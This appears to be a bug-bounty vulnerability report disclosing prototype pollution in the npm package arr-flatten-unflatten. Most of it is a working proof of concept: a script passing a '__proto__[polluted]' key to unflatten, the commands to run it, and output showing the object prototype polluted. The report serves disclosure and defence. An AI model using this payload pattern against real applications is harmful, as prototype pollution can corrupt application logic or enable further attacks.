Prototype Pollution in quernest/arr-flatten-unflatten

Valid

Reported on

Jan 10th 2021


Description

arr-flatten-unflatten is vulnerable to Prototype Pollution.

Proof of Concept

  1. Create the following PoC file:
// poc.js
var arrFlattenUnflatten = require("arr-flatten-unflatten")
console.log("Before : " + {}.polluted);
arrFlattenUnflatten.unflatten({'__proto__[polluted]': 'Yes! Its Polluted'});
console.log("After : " + {}.polluted);
  1. Execute the following commands in terminal:
npm i arr-flatten-unflatten # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
Before : undefined
After : Yes! Its Polluted
to join this conversation